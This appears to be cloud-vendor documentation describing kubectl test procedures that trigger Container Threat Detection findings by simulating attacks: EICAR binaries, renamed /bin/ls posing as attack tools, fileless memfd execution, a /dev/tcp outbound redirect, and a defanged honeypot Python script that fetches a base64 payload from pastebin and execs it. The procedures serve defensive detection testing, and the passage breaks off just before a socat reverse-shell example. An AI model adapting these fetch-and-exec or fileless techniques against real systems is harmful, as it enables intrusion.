     This test procedure triggers a Root Certificate Installed finding thatyou can view in Security Command Center and, if you have configuredLogging for Container Threat Detection, in Cloud Logging. Viewingfindings in Cloud Logging is only available if you activate thePremium or Enterprise tier of Security Command Center at the organization level.

Execution: Added Malicious Binary Executed

To trigger an Execution: Added Malicious Binary Executed finding, drop amalicious binary in your container and execute it. This example deploys thelatest Ubuntu 24.04 image, creates a simulated malicious file, and then executes it. The binary's execution isunexpected because the simulated malicious binary wasn't part of theoriginal container image, and the binary is anEICARtest file, a file classified as malicious by the threat intelligence.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Drop the EICAR binary and execute it:

   • x86 node:

     tag="ktd-test-added-malicious-binary-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"eicar='X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--sh-c\"touch /tmp/test_mal_file; echo -n '$eicar' > /tmp/test_mal_file; chmod 700 /tmp/test_mal_file; /tmp/test_mal_file; sleep 10"

   • ARM node:

     tag="ktd-test-added-malicious-binary-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"eicar='X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--sh-c\"touch /tmp/test_mal_file; echo -n '$eicar' > /tmp/test_mal_file; chmod 700 /tmp/test_mal_file; /tmp/test_mal_file; sleep 10"

This test procedure creates an Execution: Added Malicious Binary Executedfinding that you can view in Security Command Center, and in Cloud Logging ifyou've configured Logging for Container Threat Detection. Viewingfindings in Cloud Logging is only available if you activatethe Premium or Enterprise tier of Security Command Center.

For noise reduction, when you first create a container, Container Threat Detectiontemporarily filters Execution: Added Malicious Binary Executed findings. To seeall Execution: Added Malicious Binary Executed findings while a container isbeing set up, prefix your container name or Pod name withktd-test, as in theexample.

Execution: Added Malicious Library Loaded

To trigger an Execution: Added Malicious Library Loaded finding, add amalicious library in your container and load it. This example deploys thelatest Ubuntu 24.04 image, creates a simulated malicious library, and thenloads it usingmmap. The library loading is unexpected because the simulatedmalicious library wasn't part of the original container image and because thelibrary is anEICAR test file,which is classified as malicious by threat intelligence.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Add the EICAR file and load it:

   • x86 node:

     tag="ktd-test-added-malicious-library-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"eicar='X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--sh-c"      apt-get update && apt-get install -y gcc libc-dev --no-install-recommends > /dev/null 2>&1;      echo -n '$eicar' > /tmp/test_mal_lib;      cat << 'EOF' > /tmp/loader.c#include <fcntl.h>#include <sys/mman.h>#include <sys/stat.h>#include <unistd.h>#include <stdlib.h>int main(int argc, char *argv[]) {   int fd = open(argv[1], O_RDONLY);   if (fd == -1) return 1;   struct stat sb;   if (fstat(fd, &sb) == -1) return 1;   void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);   if (addr == MAP_FAILED) return 1;   write(1, addr, sb.st_size);   munmap(addr, sb.st_size);   close(fd);   return 0;}EOF      gcc /tmp/loader.c -o /tmp/loader && /tmp/loader /tmp/test_mal_lib      sleep 10"

   • ARM node:

     tag="ktd-test-added-malicious-library-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"eicar='X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--sh-c"      apt-get update && apt-get install -y gcc libc-dev --no-install-recommends > /dev/null 2>&1;      echo -n '$eicar' > /tmp/test_mal_lib;      cat << 'EOF' > /tmp/loader.c#include <fcntl.h>#include <sys/mman.h>#include <sys/stat.h>#include <unistd.h>#include <stdlib.h>int main(int argc, char *argv[]) {   int fd = open(argv[1], O_RDONLY);   if (fd == -1) return 1;   struct stat sb;   if (fstat(fd, &sb) == -1) return 1;   void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);   if (addr == MAP_FAILED) return 1;   write(1, addr, sb.st_size);   munmap(addr, sb.st_size);   close(fd);   return 0;}EOF      gcc /tmp/loader.c -o /tmp/loader && /tmp/loader /tmp/test_mal_lib      sleep 10"

This test procedure creates an Execution: Added Malicious Library Loadedfinding that you can view in Security Command Center, and in Cloud Logging ifyou've configured Logging for Container Threat Detection. Viewingfindings in Cloud Logging is only available if you activatethe Premium or Enterprise tier of Security Command Center.

For noise reduction, when you first create a container, Container Threat Detectiontemporarily filters Execution: Added Malicious Library Loaded findings. To seeall Execution: Added Malicious Library Loaded findings while a container isbeing set up, prefix your container name or Pod name withktd-test, as in theexample.

Execution: Container Escape

To trigger an Execution: Container Escape finding, place a binary in yourcontainer and execute it. This example deploys the latest Ubuntu 24.04 image,copies/bin/ls to another location, renames it to a suspicious tool(botb-linux-amd64), and executes it with additional arguments. This action isconsidered suspicious because this execution simulates behavior consistent witha container escape attempt.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Drop a Container Exploitation tool binary likebotb-linux-amd64 and executeit:

   • x86 node:

     tag="ktd-test-container-escape-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--bash-c\"cp /bin/ls /tmp/botb-linux-amd64; /tmp/botb-linux-amd64 -autopwn"

   • ARM node:

     tag="ktd-test-container-escape-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--bash-c\"cp /bin/ls /tmp/botb-linux-arm64; /tmp/botb-linux-arm64 -autopwn"

This test procedure creates an Execution: Container Escape finding thatyou can view in Security Command Center, and in Cloud Logging if you've configuredLogging for Container Threat Detection. Viewing findings inCloud Logging is only available if you activate the Premium or Enterprisetier of Security Command Center.

Execution: Fileless Execution in/memfd:

To trigger anExecution: Fileless Execution in /memfd: finding,a process must be executed from the/memfd: in-memory file system.This example uses the latest Python image. The/bin/ls utility iscopied to an anonymous file in/memfd:. This copied binary is then executed.The execution of a binary under/memfd: is flagged as suspicious because itmimics the behavior of an object trying to execute in memory to avoid file-baseddetections.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Create a privileged container and open bash to execute commands:

   • x86 node:

     tag="ktd-test-malicious-python-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagepython:latest\"$tag"--python-c"import os,sys,timetime.sleep(10)f = open('/bin/ls','rb')execdata = f.read()f.close()fd = os.memfd_create('', 0)fname = '/proc/self/fd/{}'.format(fd)f = open(fname,'wb')f.write(execdata)f.close()args = ['/bin']os.execve(fname, args, os.environ)"

   • ARM node:

     tag="ktd-test-malicious-python-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagepython:3-buster\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--python-c"import os,sys,timetime.sleep(10)f = open('/bin/ls','rb')execdata = f.read()f.close()fd = os.memfd_create('', 0)fname = '/proc/self/fd/{}'.format(fd)f = open(fname,'wb')f.write(execdata)f.close()args = ['/bin']os.execve(fname, args, os.environ)"

This test procedure creates anExecution: Fileless Execution in /memfd:finding that you can view in Security Command Center, andin Cloud Logging if you've configured Logging forContainer Threat Detection. Viewing findings in Cloud Logging is only available ifyou activate the Premium or Enterprise tier of Security Command Center.

Execution: Ingress Nightmare Vulnerability Execution

To trigger an Execution: Ingress Nightmare Vulnerability Execution (Preview) finding,execute the nginx binary in your container. This example deploys the latestUbuntu 24.04 image, copies/bin/ls to another location, renames it to an Nginxbinary (nginx), and executes it with additional arguments referencing the/proc file system. This action is deemed suspicious because itsimulates behavior consistent with the Ingress Nightmareexploit (CVE-2025-1974),thereby indicating potential remote code execution.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Create an Nginx binary likenginx and execute it while accessing the/proc file system:

   • x86 node:

     tag="ktd-test-ingress-nightmare-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--bash-c\"cp /bin/ls /tmp/nginx; /tmp/nginx /proc/1/fd/1"

   • ARM node:

     tag="ktd-test-ingress-nightmare-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--bash-c\"cp /bin/ls /tmp/nginx; /tmp/nginx /proc/1/fd/1"

This test procedure creates an Execution: Ingress Nightmare VulnerabilityExecution finding that you can view in Security Command Center and inCloud Logging if you've configured Logging forContainer Threat Detection. Viewing findings in Cloud Logging is only available ifyou activate the Premium or Enterprise tier of Security Command Center

Execution: Kubernetes Attack Tool Execution

To trigger an Execution: Kubernetes Attack Tool Execution finding, place abinary in your container and execute it. This example deploys the latest Ubuntu24.04 image, copies/bin/ls to another location, renames it to a suspicioustool (amicontained), and executes it. This action is considered suspiciousbecause it simulates behavior consistent with a potential Kubernetes attack toolexecution attempt.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Drop a Kubernetes Attack tool binary likeamicontained and execute it:

   • x86 node:

     tag="ktd-test-kubernetes-attack-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--bash-c\"cp /bin/ls /tmp/amicontained; /tmp/amicontained"

   • ARM node:

     tag="ktd-test-kubernetes-attack-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--bash-c\"cp /bin/ls /tmp/amicontained; /tmp/amicontained"

This test procedure creates an Execution: Kubernetes Attack Tool Executionfinding that you can view in Security Command Center, and in Cloud Logging ifyou've configured Logging for Container Threat Detection. Viewingfindings in Cloud Logging is only available if you activate the Premium orEnterprise tier of Security Command Center.

Execution: Local Reconnaissance Tool Execution

To trigger anExecution: Local Reconnaissance Tool Execution finding, place abinary in your container and execute it. This example deploys the latest Ubuntu24.04 image, copies/bin/ls to another location, renames it to a suspicioustool (linenum.sh), and executes it. This action is considered suspiciousbecause executing the renamed binary simulates behavior consistent with alocal reconnaissance attempt.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Introduce a Local Reconnaissance tool binary likelinenum.sh and executeit:

   • x86 node:

     tag="ktd-test-local-reconn-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--bash-c\"cp /bin/ls /tmp/linenum.sh; /tmp/linenum.sh"

   • ARM node:

     tag="ktd-test-local-reconn-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--bash-c\"cp /bin/ls /tmp/linenum.sh; /tmp/linenum.sh"

This test procedure creates an Execution: Local Reconnaissance ToolExecution finding that you can view in Security Command Center, and inCloud Logging if you've configured Logging forContainer Threat Detection. Viewing findings in Cloud Logging is only available ifyou activate the Premium or Enterprise tier of Security Command Center.

Execution: Malicious Python Executed

This feature is subject to the "Pre-GA Offerings Terms" in the General Service Terms section of theService Specific Terms. Pre-GA features are available "as is" and might have limited support. For more information, see thelaunch stage descriptions.

To trigger an Execution: Malicious Python Executed finding, you can execute Pythonin the following procedure in your container.

The procedure deploys the latest Python image, copies Python code thatappears malicious, and then executes it. To trigger a detection, the Python codemust appear malicious to the detector.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Execute the following script in a new container.

   This Python code originated from ahoneypot. However,it was modified so that it does not execute the malicious binary.Running the script won't cause malicious activity in your container.The binary at the referenced URL does not exist and attemptingto follow the URL results in a 404 error. This is expected.Theattempt to download, decode, and execute a binary using aninline script is what triggers the detection.

   • x86 node:

     tag="ktd-test-malicious-python-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/python:latest\"$tag"--python-c"import urllibimport base64import osurl = 'https://pastebin.com/raw/Z'page = base64.b64decode(urllib.urlopen(url).read())page = ''f = os.popen(str(page))url = 'https://pastebin.com/raw/Z'd = 'https://pastebin.com/raw/Z'page = base64.b64decode(urllib.urlopen(url).read())page = ''exec(page)"

   • ARM node:

     tag="ktd-test-malicious-python-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagepython:3-buster\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--python-c"import urllibimport base64import osurl = 'https://pastebin.com/raw/Z'page = base64.b64decode(urllib.urlopen(url).read())page = ''f = os.popen(str(page))url = 'https://pastebin.com/raw/Z'd = 'https://pastebin.com/raw/Z'page = base64.b64decode(urllib.urlopen(url).read())page = ''exec(page)"

This test procedure creates an Execution: Malicious Python Executed finding thatyou can view in Security Command Center and in Cloud Logging if you configuredlogging for Container Threat Detection. Viewing findings in Cloud Logging isonly available if you activate the Premium or Enterprise tier of Security Command Center.

Execution: Modified Malicious Binary Executed

To trigger an Execution: Modified Malicious Binary Executed finding, modify amalicious binary in your container and execute it. This example deploys thelatest Ubuntu 24.04 image, modifies/etc/issue to anEICARtesting malicious file, and then executes it. The binary's execution isunexpected because the created/etc/issue is modified during container runtime asan EICAR testing malicious binary, and the EICAR binary is a known malicious fileaccording to the threat intelligence.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Drop the EICAR binary and execute it:

   • x86 node:

     tag="ktd-test-modified-malicious-binary-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"eicar='X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--sh-c"echo -n '$eicar' > /etc/issue; chmod 700 /etc/issue; /etc/issue; sleep 10"

   • ARM node:

     tag="ktd-test-modified-malicious-binary-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"eicar='X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--sh-c"echo -n '$eicar' > /etc/issue; chmod 700 /etc/issue; /etc/issue; sleep 10"

This test procedure creates an Execution: Modified Malicious Binary Executed finding that you canview in Security Command Center, and in Cloud Logging if you've configuredLogging for Container Threat Detection. Viewing findings inCloud Logging is only available if you activate the Premium or Enterprisetier of Security Command Center.

For noise reduction, when you first create a container, Container Threat Detectiontemporarily filters Execution: Modified Malicious Binary Executed findings. To seeall Execution: Modified Malicious Binary Executed findings while a container isbeing set up, prefix your container name or Pod name withktd-test, as in theexample.

Execution: Modified Malicious Library Loaded

To trigger an Execution: Modified Malicious Library Loaded finding, modify anexisting file with a malicious library in your container and load it. Thisexample deploys the latest Ubuntu 24.04 image, updates the/etc/issue filewith a simulated malicious library, and then loads it usingmmap. The libraryloading of an existing file is unexpected because the library is anEICARtest file, which is classified as malicious by threat intelligence.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Add the EICAR file and load it:

   • x86 node:

     tag="ktd-test-modified-malicious-library-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"eicar='X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--sh-c"      apt-get update && apt-get install -y gcc libc-dev --no-install-recommends > /dev/null 2>&1;      echo -n '$eicar' > /etc/issue;      cat << 'EOF' > /tmp/loader.c#include <fcntl.h>#include <sys/mman.h>#include <sys/stat.h>#include <unistd.h>#include <stdlib.h>int main(int argc, char *argv[]) {   int fd = open(argv[1], O_RDONLY);   if (fd == -1) return 1;   struct stat sb;   if (fstat(fd, &sb) == -1) return 1;   void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);   if (addr == MAP_FAILED) return 1;   write(1, addr, sb.st_size);   munmap(addr, sb.st_size);   close(fd);   return 0;}EOF      gcc /tmp/loader.c -o /tmp/loader && /tmp/loader /etc/issue      sleep 10"

   • ARM node:

     tag="ktd-test-modified-malicious-library-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"eicar='X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--sh-c"      apt-get update && apt-get install -y gcc libc-dev --no-install-recommends > /dev/null 2>&1;      echo -n '$eicar' > /etc/issue;      cat << 'EOF' > /tmp/loader.c#include <fcntl.h>#include <sys/mman.h>#include <sys/stat.h>#include <unistd.h>#include <stdlib.h>int main(int argc, char *argv[]) {   int fd = open(argv[1], O_RDONLY);   if (fd == -1) return 1;   struct stat sb;   if (fstat(fd, &sb) == -1) return 1;   void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);   if (addr == MAP_FAILED) return 1;   write(1, addr, sb.st_size);   munmap(addr, sb.st_size);   close(fd);   return 0;}EOF      gcc /tmp/loader.c -o /tmp/loader && /tmp/loader /etc/issue      sleep 10"

This test procedure creates an Execution: Modified Malicious Library Loadedfinding that you can view in Security Command Center, and in Cloud Logging ifyou've configured Logging for Container Threat Detection. Viewingfindings in Cloud Logging is only available if you activatethe Premium or Enterprise tier of Security Command Center.

For noise reduction, when you first create a container, Container Threat Detectiontemporarily filters Execution: Modified Malicious Library Loaded findings. To seeall Execution: Modified Malicious Library Loaded findings while a container isbeing set up, prefix your container name or Pod name withktd-test, as in theexample.

Execution: Netcat Remote Code Execution In Container

To trigger anExecution: Netcat Remote Code Execution In Container event, abinary capable of network communication (like netcat itself, or a renamed copyof another utility) needs to be present and executed inside the container. Thisexample deploys the latest Ubuntu 24.04 image as a base. It copies the/bin/lsbinary and renames that copy tonc (a network utility). This renamedbinary is then executed with arguments appropriate for network interaction. Thisactivity is flagged as suspicious because it mimics the behavior often observedduring actual remote code execution attempts within containerized environments.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Introduce a network communication tool binary likenc and executeit with appropriate arguments:

   • x86 node:

     tag="ktd-test-netcat-remote-code-exec-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--bash-c\"cp /bin/ls /tmp/nc; /tmp/nc -e"

   • ARM node:

     tag="ktd-test-netcat-remote-code-exec-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--bash-c\"cp /bin/ls /tmp/nc; /tmp/nc -e"

This test procedure creates anExecution: Netcat Remote Code Execution InContainer finding that you can view in Security Command Center, and inCloud Logging if you've configured Logging forContainer Threat Detection. Viewing findings in Cloud Logging is only available ifyou activate the Premium or Enterprise tier of Security Command Center.

Execution: Possible Arbitrary Command Execution through CUPS (CVE-2024-47177)

To trigger anExecution: Possible Arbitrary Command Execution through CUPS (CVE-2024-47177)finding, the execution of a shell process by thefoomatic-rip must take place.This example uses the latest Ubuntu 24.04 image. It copies/bin/bash to/tmp/foomatic-rip. This renamed and copied binary is ran as a shell script tocreate a child shell command. This behavior is flagged as suspicious because itcan indicate an attempt to execute arbitrary workloads on compromised systems.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Execute the command with appropriate arguments:

   • x86 node:

     tag="ktd-test-cups-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--bash-c\'cp /bin/bash /tmp/foomatic-rip; echo "#!/tmp/foomatic-rip" >> /tmp/test.sh; echo "sh -c echo hello" >> /tmp/test.sh; chmod +x /tmp/test.sh; /tmp/test.sh; sleep 10'

   • ARM node:

     tag="ktd-test-cups-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--bash-c\'cp /bin/bash /tmp/foomatic-rip; echo "#!/tmp/foomatic-rip" >> /tmp/test.sh; echo "sh -c echo hello" >> /tmp/test.sh; chmod +x /tmp/test.sh; /tmp/test.sh; sleep 10'

This test procedure creates anExecution: Possible Arbitrary Command Execution through CUPS (CVE-2024-47177)finding that you can view in Security Command Center and in Cloud Logging ifyou've configured Logging for Container Threat Detection. Viewingfindings in Cloud Logging is only available if you activate the Premium orEnterprise tier of Security Command Center.

Execution: Possible Remote Command Execution Detected

To trigger anExecution: Possible Remote Command Execution Detected(Preview) finding, the execution of a command or binary commonlyassociated with remote command execution must be observed within a container.This example uses the latest Ubuntu 24.04 image. It copies/bin/ls and renamesthat totouch (or another tool likefind). This renamed binary is thenexecuted with arguments appropriate for remote command execution. This behavioris flagged as suspicious because it can indicate an attempt to establishunauthorized remote access to or from the container.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Execute a binary liketouch with appropriate arguments:

   • x86 node:

     tag="ktd-test-remote-cmd-exec-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--bash-c\"cp /bin/ls /tmp/touch; echo "Hello" | /tmp/touch >& /dev/tcp/8.8.8.8/53"

   • ARM node:

     tag="ktd-test-remote-cmd-exec-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--bash-c\"cp /bin/ls /tmp/touch; echo "Hello" | /tmp/touch >& /dev/tcp/8.8.8.8/53"

This test procedure creates anExecution: Possible Remote CommandExecution Detected finding that you can view in Security Command Center and inCloud Logging if you've configured Logging forContainer Threat Detection. Viewing findings in Cloud Logging is only available ifyou activate the Premium or Enterprise tier of Security Command Center.

Execution: Program Run with Disallowed HTTP Proxy Env

To trigger anExecution: Program Run with Disallowed HTTP Proxy Env finding,execute a program within a container, setting an HTTP proxy environment variableto a disallowed value. This example uses the latest Ubuntu 24.04 image. The/bin/ls utility is copied and renamed to/tmp/curl. This renamed binary isthen executed with a disallowed value set for an HTTP proxy environment variable(for example,HTTP_PROXY,http_proxy). The combination of program execution and thepresence of a disallowed HTTP proxy environment is flagged as suspicious, as itsuggests an attempt to communicate through an unauthorized proxy.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Execute a network-capable binary, likecurl, and execute it with a disallowedHTTP proxy environment variable:

   • x86 node:

     tag="ktd-test-program-with-http-proxy-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--bash-c\"cp /bin/ls /tmp/curl; HTTP_PROXY=127.0.0.1:8080 /tmp/curl"

   • ARM node:

     tag="ktd-test-program-with-http-proxy-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--bash-c\"cp /bin/ls /tmp/curl; HTTP_PROXY=127.0.0.1:8080 /tmp/curl"

This test procedure creates anExecution: Program Run with DisallowedHTTP Proxy Env finding that you can view in Security Command Center, andin Cloud Logging if you've configured Logging forContainer Threat Detection. Viewing findings in Cloud Logging is only available ifyou activate the Premium or Enterprise tier of Security Command Center.

Execution: Socat Reverse Shell Detected

To trigger anExecution: Socat Reverse Shell Detected finding,a process reverse shell connection must be established by thesocat utility.This example uses the latest Ubuntu 24.04 image. Thesocat utility isinstalled and a local tcp listener is created and then bound to by the socatutility. The reverse shell created bysocat is flagged as suspicious because itallows an attacker to run arbitrary workloads on the system.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Create a container and execute thesocat utility:

   • x86 node:

